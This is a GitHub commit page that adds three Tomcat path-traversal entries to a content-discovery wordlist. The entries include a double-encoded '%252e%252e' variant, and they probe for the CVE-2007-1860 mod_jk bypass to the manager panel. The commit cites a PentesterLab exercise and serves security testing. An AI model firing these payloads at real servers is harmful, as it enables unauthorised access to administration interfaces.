Skip to content

Commit

Permalink
Support for CVE-2007-1860 mod_jk double encoding
Browse files Browse the repository at this point in the history 
Added paths that will check access control bypass using double encoding (CVE-2007-1860) that could allow a remote user to access Tomcat's administration panel.
Based on the scenario demonstrated on https://pentesterlab.com/exercises/cve-2007-1860/course
  • Loading branch information
@henshin
henshin authored Jul 28, 2016
1 parent c874149 commit fff5faa
Showing 1 changed file with 3 additions and 0 deletions.
3 changes: 3 additions & 0 deletions Discovery/Web_Content/tomcat.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,6 +21,9 @@ examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
examples/servlet/snoop
examples/servlets/index.html
examples/../manager/html
examples/%2e%2e/manager/html
examples/%252e%252e/manager/html
host-manager
host-manager/add
host-manager/host-manager.xml
Expand Down

0 comments on commit fff5faa

Please sign in to comment.